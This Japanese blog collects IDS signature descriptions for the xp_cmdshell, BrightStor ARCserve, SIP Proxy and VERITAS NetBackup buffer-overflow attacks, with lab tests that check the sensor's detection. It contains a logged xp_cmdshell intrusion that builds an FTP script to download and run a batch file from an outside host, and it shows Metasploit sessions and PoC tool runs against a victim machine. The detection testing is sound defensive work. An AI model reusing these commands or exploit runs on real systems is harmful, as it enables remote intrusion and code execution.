つぶやき

このブログは,ご覧頂いたあなたのコンピュータが犯罪に利用されていないか?確認していただく為のひとつの手段としてご利用頂ければ幸いです。電子メール:amaterasu@job.email.ne.jp


テーマ:

SQL keyword "xp_cmdshell" has been detected (SQL_XP_CMDSHELL_Detected)
About this signature or vulnerability
Proventia Desktop, Proventia G-Series, Proventia Network IPS, RealSecure Network Sensor, RealSecure Server Sensor, BlackICE PC Protection, BlackICE Agent for Server, Proventia Server for Windows, BlackICE Server Protection, Proventia M-Series:

This signature detects usage of the SQL keyword "xp_cmdshell". Usage of this SQL command allows direct access to shell programs that could be used further compromise the SQL server and other systems.



Default risk level
Medium

Sensors that have this signature
Proventia Desktop: 8.0.675.1700, Proventia G-Series: XPU 24.31, Proventia Network IPS: XPU 1.70, RealSecure Network Sensor: XPU 24.31, RealSecure Server Sensor: XPU 24.31, BlackICE PC Protection: 3.6cpb, BlackICE Agent for Server: 3.6epb, Proventia Server for Windows: 1.0.914.1700, BlackICE Server Protection: 3.6.cpb, Proventia M-Series: XPU 1.70

Systems affected
AIX: Any version, Mac OS: Any version, Windows 2003: Any version, DG/UX: Any version, Windows: 95, OS/2: Any version, Windows: 98, Windows NT: 4.0, Linux: Any version, IRIX: Any version, BSD: Any version, HP-UX: Any version, Solaris: Any version, SCO Unix: Any version, Windows: 98 Second Edition, Windows 2000: Any version, Tru64 UNIX: Any version, Windows: Me, Windows: XP

Type
Suspicious Activity

Vulnerability description
The SQL keyword "xp_cmdshell" has been detected in an SQL session. This SQL command may be used to run any shell command in the context of the user that invoked the command. Usage of this SQL command may be suspicious.

How to remove this vulnerability
Verify that the usage of the command is authorized, block the connection if it is not authorized.


References
ISS X-Force
SQL keyword "xp_cmdshell" has been detected
http://www.iss.net/security_center/static/25155.php


2006-03-29 11:05:57 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "dir c:\\
2006-03-29 11:05:58 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "dir c:\\
2006-03-29 11:06:03 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "dir C:\\ /oen
2006-03-29 11:06:03 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "dir C:\\ /oen
2006-03-29 11:08:00 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "dir c:\\
2006-03-29 11:08:07 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "net start
2006-03-29 11:08:17 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo open 196.35.70.85 1050 >>c:\\sql.txt
2006-03-29 11:08:18 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo user bot files >>c:\\sql.txt
2006-03-29 11:08:19 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo binary >>c:\\sql.txt
2006-03-29 11:08:20 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo get start.bat %SYSTEMROOT%\\system32\\spool\\printers\\start.bat >>c:\\sql.txt
2006-03-29 11:08:21 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo quit >>c:\\sql.txt
2006-03-29 11:08:22 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "ftp -n -v -s:c:\\sql.txt
2006-03-29 11:11:55 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "dir c:\\kill* /s
2006-03-29 11:12:07 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "taskkill
2006-03-29 11:12:15 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo. >c:\\sql.txt
2006-03-29 11:12:16 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo. >c:\\sql.txt
2006-03-29 11:12:17 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo. >c:\\sql.txt
2006-03-29 11:12:17 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "echo. >c:\\sql.txt
2006-03-29 11:12:22 JST SQL_XP_CMDSHELL_Detected xp_cmdshell "type c:\\sql.txt

AD
いいね!した人  |  リブログ(0)

テーマ:


項目

攻撃

リモート

攻撃ポート

41524

対象OS

Unix/Windows

CVE

CVE-2005-0260

MS

PAM

BrightStor Discovery service buffer overflow (BrightStor_Discovery_UDP_Overflow)

About this signature or vulnerability

RealSecure Server Sensor, RealSecure Network Sensor:


This signature detects a specially-crafted overflow request to port 41524/UDP.


Default risk level

High


Sensors that have this signature

RealSecure Server Sensor: XPU 24.31, RealSecure Network Sensor: XPU 24.31


Systems affected

Windows: 95, Windows: 98, Windows NT: 4.0, Windows: 98 Second Edition, Windows 2000: Any version, Windows: XP, Windows: Me, BrightStor ARCserve Backup for Windows: r11.1, BrightStor Enterprise Backup: 10.5, BrightStor ARCserve for NetWare: r11.1, BrightStor ARCserve Backup for Windows: 2000 Japanese, BrightStor ARCserve Backup for Windows: r11.0, BrightStor Enterprise Backup for Window: v10.0, BrightStor ARCserve Backup for Windows: v9.0, BrightStor ARCserve Backup-Win(64 bit): r11.1, BrightStor ARCserve Backup-Win(64 bit): r11.0, BrightStor Enterprise Backup-Win(64 bit: v10.5, BrightStor ARCserve for NetWare: v9, Windows 2003: Any version


Type

Unauthorized Access Attempt


Vulnerability description

BrightStor ARCserve Backup, BrightStor Enterprise Backup and BrightStor ARCserve 2000 are vulnerable to a buffer overflow, caused by improper bounds checking in the Discovery service. A remote attacker could exploit this vulnerability to overflow a buffer and possibly cause a denial of service or execute arbitrary code on the system.


How to remove this vulnerability

For BrightStor ARCserve Backup v9.0, r11.0, and r11.1 for Windows:

Upgrade to the latest BrightStor ARCserve Backup for Windows, available from the BrightStor Web site. See References.


BrightStor Enterprise Backup version v10.0 and v10.5 for Windows:

Upgrade to the latest BrightStor Enterprise for Windows, available from the BrightStor Web site. See References.


BrightStor ARCserve Backup version r11.0 and r11.1 for Windows (64 Bit Edition):

Upgrade to the latest BrightStor ARCserve Backup for Windows, available from the BrightStor Web site. See References.


BrightStor Enterprise Backup v10.5 for Windows (64 Bit Edition):

Upgrade to the latest BrightStor Enterprise for Windows (64 Bit Edition), available from the BrightStor Web site. See References.


BrightStor ARCserve Backup v9.01 for Windows (64 Bit Edition):

Upgrade to the latest BrightStor Enterprise for Windows (64 Bit Edition), available from the BrightStor Web site. See References.


BrightStor ARCserve 2000 Backup for Windows (Japanese Only):

Upgrade to the latest BrightStor ARCserve 2000 Backup for Windows (Japanese), available from the BrightStor Web site. See References.


BrightStor ARCserve Backup v9 and r11.1 for NetWare:

Upgrade to the latest BrightStor ARCserve Backup for Netware, available from the BrightStor Web site. See References.


検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.11

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.70


実証コード

Supported Exploit Targets

=========================


0 cheyprod.dll 12/12/2003


msf cabrightstor_disco(win32_bind) > set TARGET 0

TARGET -> 0

msf cabrightstor_disco(win32_bind) > exploit

[*] Starting Bind Handler.

[*] Attempting to exploit target cheyprod.dll 12/12/2003

[*] Sending 4096 bytes to remote host.

[*] Exiting Bind Handler.


msf cabrightstor_disco(win32_bind) >


影響

リモートからのコマンドの実行が可能


トレース

イベント一覧

優先度

シグネチャ名

検知件数

High

BrightStor_Discovery_UDP_Overflow

1



イベント詳細

BrightStor_Discovery_UDP_Overflow.jpg

AD
いいね!した人  |  リブログ(0)

テーマ:

項目

攻撃

リモート

攻撃ポート

5060

対象OS

Unix/Windows

CVE

CVE-2005-4466

MS

PAM

SIP Proxy i3sipmsg.dll buffer overflow (SIP_Proxy_Overflow)

About this signature or vulnerability

RealSecure Server Sensor, RealSecure Network Sensor:


This signature detects an overflow in the way The Interaction SIP Proxy routes incoming SIP messages.


Default risk level

High


Sensors that have this signature

RealSecure Server Sensor: XPU 24.31, RealSecure Network Sensor: XPU 24.31


Systems affected

Windows NT: 4.0, Windows: 98, Windows: 98 Second Edition, Windows 2000: Any version, Windows: Me, Windows: XP, Windows 2003: Any version, SIP Proxy: 3.0.010


Type

Unauthorized Access Attempt


Vulnerability description

SIP Proxy from Interaction is a SIP (Session Initiation Protocol) application for Microsoft Windows operating systems. SIP Proxy version 3.0.010 is vulnerable to a denial of service attack, caused by a heap-based buffer overflow in i3sipmsg.dll. By sending a specially-crafted request containing 2900 bytes of encoded space (0x20) or TAB (0x9) characters as the SIP version in a REGISTER request line, a remote attacker could overflow a buffer and cause the application to crash. It is also possible for an attacker to exploit this vulnerability to execute arbitrary code on the system.


How to remove this vulnerability

No remedy available as of December 2005.


検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.11

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.7.0


実証コード

C:\tool>i3sip.pl

Interactive SIP proxy heap corruption POC

By Behrang Fouladi, Hat-Squad Security Team

Usage: perl C:\tool\BrightStor_Discovery_UDP_Overflow_i3sip.pl <target> <size>


C:\tool>i3sip.pl 192.168.221.180 44444


Interactive SIP proxy heap corruption POC

By Behrang Fouladi, Hat-Squad Security Team

Exploit Sent to 192.168.221.180...

The SIP Proxy should crash now.


トレース

イベント一覧

優先度

シグネチャ名

知件数

High

SIP_Proxy_Overflow

3

Low

SIP_Version_Not2

5



イベント詳細


SIP_Proxy_Overflow.jpg


AD
いいね!した人  |  リブログ(0)

テーマ:

BrightStor Discovery service buffer overflow (BrightStor_Discovery_UDP_Overflow)
About this signature or vulnerability
RealSecure Server Sensor, RealSecure Network Sensor:

This signature detects a specially-crafted overflow request to port 41524/UDP.



Default risk level
High


Sensors that have this signature
RealSecure Server Sensor: XPU 24.31, RealSecure Network Sensor: XPU 24.31


Systems affected
Windows: 95, Windows: 98, Windows NT: 4.0, Windows: 98 Second Edition, Windows 2000: Any version, Windows: XP, Windows: Me, BrightStor ARCserve Backup for Windows: r11.1, BrightStor Enterprise Backup: 10.5, BrightStor ARCserve for NetWare: r11.1, BrightStor ARCserve Backup for Windows: 2000 Japanese, BrightStor ARCserve Backup for Windows: r11.0, BrightStor Enterprise Backup for Window: v10.0, BrightStor ARCserve Backup for Windows: v9.0, BrightStor ARCserve Backup-Win(64 bit): r11.1, BrightStor ARCserve Backup-Win(64 bit): r11.0, BrightStor Enterprise Backup-Win(64 bit: v10.5, BrightStor ARCserve for NetWare: v9, Windows 2003: Any version


Type
Unauthorized Access Attempt

Vulnerability description
BrightStor ARCserve Backup, BrightStor Enterprise Backup and BrightStor ARCserve 2000 are vulnerable to a buffer overflow, caused by improper bounds checking in the Discovery service. A remote attacker could exploit this vulnerability to overflow a buffer and possibly cause a denial of service or execute arbitrary code on the system.


How to remove this vulnerability
For BrightStor ARCserve Backup v9.0, r11.0, and r11.1 for Windows:
Upgrade to the latest BrightStor ARCserve Backup for Windows, available from the BrightStor Web site. See References.

BrightStor Enterprise Backup version v10.0 and v10.5 for Windows:
Upgrade to the latest BrightStor Enterprise for Windows, available from the BrightStor Web site. See References.

BrightStor ARCserve Backup version r11.0 and r11.1 for Windows (64 Bit Edition):
Upgrade to the latest BrightStor ARCserve Backup for Windows, available from the BrightStor Web site. See References.

BrightStor Enterprise Backup v10.5 for Windows (64 Bit Edition):
Upgrade to the latest BrightStor Enterprise for Windows (64 Bit Edition), available from the BrightStor Web site. See References.

BrightStor ARCserve Backup v9.01 for Windows (64 Bit Edition):
Upgrade to the latest BrightStor Enterprise for Windows (64 Bit Edition), available from the BrightStor Web site. See References.

BrightStor ARCserve 2000 Backup for Windows (Japanese Only):
Upgrade to the latest BrightStor ARCserve 2000 Backup for Windows (Japanese), available from the BrightStor Web site. See References.

BrightStor ARCserve Backup v9 and r11.1 for NetWare:
Upgrade to the latest BrightStor ARCserve Backup for Netware, available from the BrightStor Web site. See References.


実証コード

msf cabrightstor_disco(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target cheyprod.dll 12/12/2003
[*] Sending 4096 bytes to remote host.
[*] Exiting Bind Handler.


検知イベント

BrightStor_Discovery_UDP_Overflow



References
Secunia Security Advisory: SA14183
BrightStor ARCserve Backup Discovery Service Buffer Overflow
http://secunia.com/advisories/14183/

BrightStor updates Web site
BrightStor updates
http://supportconnect.ca.com/sc/support/Index

US-CERT Vulnerability Note VU#864801
Computer Associates BrightStor ARCserve Backup Discovery Service vulnerable to buffer overflow
http://www.kb.cert.org/vuls/id/864801

ISS X-Force
BrightStor Discovery service buffer overflow
http://www.iss.net/security_center/static/19251.php

CVE
CVE-2005-0260
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0260

いいね!した人  |  リブログ(0)

テーマ:

項目

攻撃

リモート

攻撃ポート

13701

対象OS

Unix/Windows

CVE

CVE-2005-3116

MS

PAM


VERITAS NetBackup Volume Manager Daemon (VMD) buffer overflow (Veritas_NetBackup_VolumeMgr_Overflow)
このシグネチャまたは脆弱点について
RealSecure Server Sensor、RealSecure Network Sensor:

このシグネチャは、リモートからバッファ オーバーフローを引き起こす可能性がある、TCP ポート 13701 上で実行するボリューム マネージャ デーモン (vmd) への特殊な形式の要求を検出します。



デフォルトの危険度
高危険度



このシグネチャが添付されているセンサー
RealSecure Server Sensor: XPU 24.29 以降、RealSecure Network Sensor: XPU 24.29 以降



影響を受けるシステム
Windows 2003: 任意のバージョン、AIX: 任意のバージョン、VERITAS NetBackup 5.1: 任意のバージョン、VERITAS NetBackup 5.0: 任意のバージョン、Windows 2000: すべてのバージョン、Tru64 UNIX: 任意のバージョン、Mac OS: 任意のバージョン、Windows: XP、Windows NT: 4.0、Linux: 任意のバージョン、IRIX: 任意のバージョン、HP-UX: 任意のバージョン、BSD: 任意のバージョン、Solaris: 任意のバージョン



タイプ
不正アクセスの試み



脆弱点の説明
VERITAS NetBackup は、バックアップ/リカバリ ソフトウェア ソリューションです。 NetBackup バージョン 5.0 および 5.1 では、バッファ オーバーフローが原因で、リモートの攻撃者がシステム上で任意のコードを実行する可能性があります。 リモートの攻撃者は、サービス不能を引き起こしたり、VMD を使用してシステム上で任意のコードを実行するなどして、ボリューム マネージャ デーモン (VMD) のバッファ オーバーフロー脆弱点を悪用する可能性があります。



この脆弱点の解決方法
Symantec Security Advisory SYM05-024 を参照して、システムに適したパッチを適用します。


詳細

VERITAS NetBackup Volume Manager Daemon (VMD) buffer overflow

http://www.iss.net/security_center/static/22985.php


実証コード

C:\>NetBackup.exe

Veritas NetBackup v4/v5/v6 "Volume Manager Daemon" Stack Overflow.

Usage: NetBackup.exe <local ip> <local port> <remote ip> <type>


Types (tested):

0 - NetBackup v5.0_1A

NetBackup v5.0_2

NetBackup v5.0_3

NetBackup v5.1


C:\>NetBackup.exe 192.168.221.11 20 192.168.221.180 0

Veritas NetBackup v4/v5/v6 "Volume Manager Daemon" Stack Overflow.

Sending first buffer.


イベント詳細

Veritas_NetBackup_VolumeMgr_Overflow.jpg

いいね!した人  |  リブログ(0)

テーマ:

項目

攻撃

リモート

攻撃ポート

6070

対象OS

Unix/Windows

CVE

CAN-2005-1272

MS


BrightStor ARCserve Backup and Enterprise Backup buffer overflow (BrightStor_BackupAgent_Overflow)
このシグネチャまたは脆弱点について
RealSecure Network Sensor、RealSecure Server Sensor:

このシグネチャは、TCP ポート 6070 上のスタックベース バッファ オーバーフローを検出します。


デフォルトの危険度
高危険度

このシグネチャが添付されているセンサー
RealSecure Network Sensor: XPU 24.14 以降、RealSecure Server Sensor: XPU 24.14 以降

影響を受けるシステム
Windows 2003: 任意のバージョン、BrightStor ARCserve Backup for Windows: r11.0、BrightStor Enterprise Backup for Window: r10.5、BrightStor Enterprise Backup for Window: v10.0、BrightStor ARCserve Backup for Windows: r11.1、BrightStor ARCserve Backup for Windows: 9.01、Windows: XP、Windows 2000: 任意のバージョン、Windows: Me、Windows: 98 Second Edition、Windows: 98、Windows NT: 4.0、Windows: 95

タイプ
不正アクセスの試み

脆弱点の説明
Computer Associates の Microsoft Windows 対応の BrightStor ARCserve Backup バージョン 9.01、11、r11.1、および Enterprise Backup versions 10.0、10.5 では、ポート 6070 にデータを送信する際にユーザーが入力した不適切な境界チェックによって発生する、スタックベースのバッファ オーバーフローに対して脆弱です。 リモートの攻撃者は、3168 バイトを超える文字列をポート 6070 に送信することでバッファをオーバーフローさせ、SYSTEM レベル権限を使用してシステム上で任意のコードを実行したり、サービス不能を引き起こしたりする可能性があります。

この脆弱点の解決方法
BrightStor ARCserve Backup r11.1 の場合:
Computer Associates SupportConnect の Web ページから、この脆弱点に適した APAR Q070767 fix を入手して適用します。

BrightStor ARCserve Backup r11.0 の場合:
Computer Associates SupportConnect の Web ページから、この脆弱点に適した APAR Q070769 fix を入手して適用します。

BrightStor ARCserve Backup 9.01 の場合:
Computer Associates SupportConnect の Web ページから、この脆弱点に適した APAR Q070770 fix を入手して適用します。

BrightStor Enterprise Backup 10.5 の場合:
Computer Associates SupportConnect の Web ページから、この脆弱点に適した APAR Q070774 fix を入手して適用します。

BrightStor Enterprise Backup 10.0 の場合:
Computer Associates SupportConnect の Web ページから、この脆弱点に適した APAR Q070773 fix を入手して適用します。

詳細
BrightStor ARCserve Backup and Enterprise Backup buffer overflow
http://www.iss.net/security_center/static/21656.php



検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.11

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.66


実証コード

msf cabrightstor_uniagent > show targets


Supported Exploit Targets

=========================


0 Magic Heap Target #1


msf cabrightstor_uniagent > set TARGET 0

TARGET -> 0

msf cabrightstor_uniagent > show payloads


Metasploit Framework Usable Payloads

====================================


win32_exec Windows Execute Command

win32_reverse_ord Windows Staged Reverse Ordinal Shell

win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject


msf cabrightstor_uniagent(win32_exec) > show options


Exploit and Payload Options

===========================


Exploit: Name Default Description

-------- ------ ------- ------------------

required RHOST The target address

required RPORT 6050 The target port


Payload: Name Default Description

-------- -------- ------- ------------------------------------------


required EXITFUNC process Exit technique: "process", "thread", "seh"

required CMD The command string to execute


Target: Magic Heap Target #1


---------------------------------------------------------------------------------------------------------

[root@linux _Other]# ./CABrightStorSQL

Usage

-----

[bindshell] ./CABrightStorSQL

[reverseshell] ./CABrightStorSQL

[root@linux _Other]# ./CABrightStorSQL 192.168.221.180

connecting to 192.168.221.180:6070...ok!

attacking with 3288 bytes...done!

トレース

イベント一覧

優先度

シグネチャ名

検知件数

High

BrightStor_BackupAgent_Overflow

1

Low

TCP_Probe_Other

1

イベント詳細

BrightStor_BackupAgent_Overflow.jpg



いいね!した人  |  リブログ(0)

テーマ:

項目

攻撃

リモート

攻撃ポート

41523

対象OS

Windows

CVE

APAR

Q064538


攻撃の概要

ISS X-Force
BrightStor Discovery servicepc buffer overflow
http://www.iss.net/security_center/static/19320.php


検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.110

Victim:

Windows2000

192.168.221.180

センサ-

ProvenitaM10

XPU1.66



実証コード

[root@linux _Other]# ./CABrightStorSQL_exp 192.168.221.180

connecting to 192.168.221.180:41523...ok!

attacking with 4128 bytes...done!


トレース

イベント一覧

優先度

シグネチャ名

検知件数

High

BrightStor_Discovery_Overflow

1

Low

TCP_Probe_Other

1


イベント詳細

BrightStor_Discovery_Overflow.jpg


参考情報

  • BugTraq Mailing List, Fri Feb 11 2005 - 12:19:23 CST , BrightStor ARCserve Backup buffer overflow PoC at http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html .
  • BugTraq Mailing List, Sat Feb 12 2005 - 21:08:56 CST, Re: BrightStor ARCserve Backup buffer overflow PoC at http://archives.neohapsis.com/archives/bugtraq/2005-02/0144.html .
  • BugTraq Mailing List, Wed Feb 16 2005 - 18:36:06 CST, RE: BrightStor ARCserve Backup buffer overflow PoC (fix available) at http://archives.neohapsis.com/archives/bugtraq/2005-02/0245.html .
  • Computer Associates SupportConnect Web page, BRIGHTSTOR ARCSERVE BACKUP FOR WINDOWS COMMON- AXWBAS at http://supportconnect.ca.com/sc/solcenter/sol_detail.jsp?aparno=QO64496&os=NT&returninput=0 .
  • Computer Associates SupportConnect Web page, SupportConnect at http://supportconnect.ca.com/sc/solcenter/sol_detail.jsp?aparno=QO64538&os=NT&returninput=0&prev=true .






  • いいね!した人  |  リブログ(0)

    AD

    ブログをはじめる

    たくさんの芸能人・有名人が
    書いているAmebaブログを
    無料で簡単にはじめることができます。

    公式トップブロガーへ応募

    多くの方にご紹介したいブログを
    執筆する方を「公式トップブロガー」
    として認定しております。

    芸能人・有名人ブログを開設

    Amebaブログでは、芸能人・有名人ブログを
    ご希望される著名人の方/事務所様を
    随時募集しております。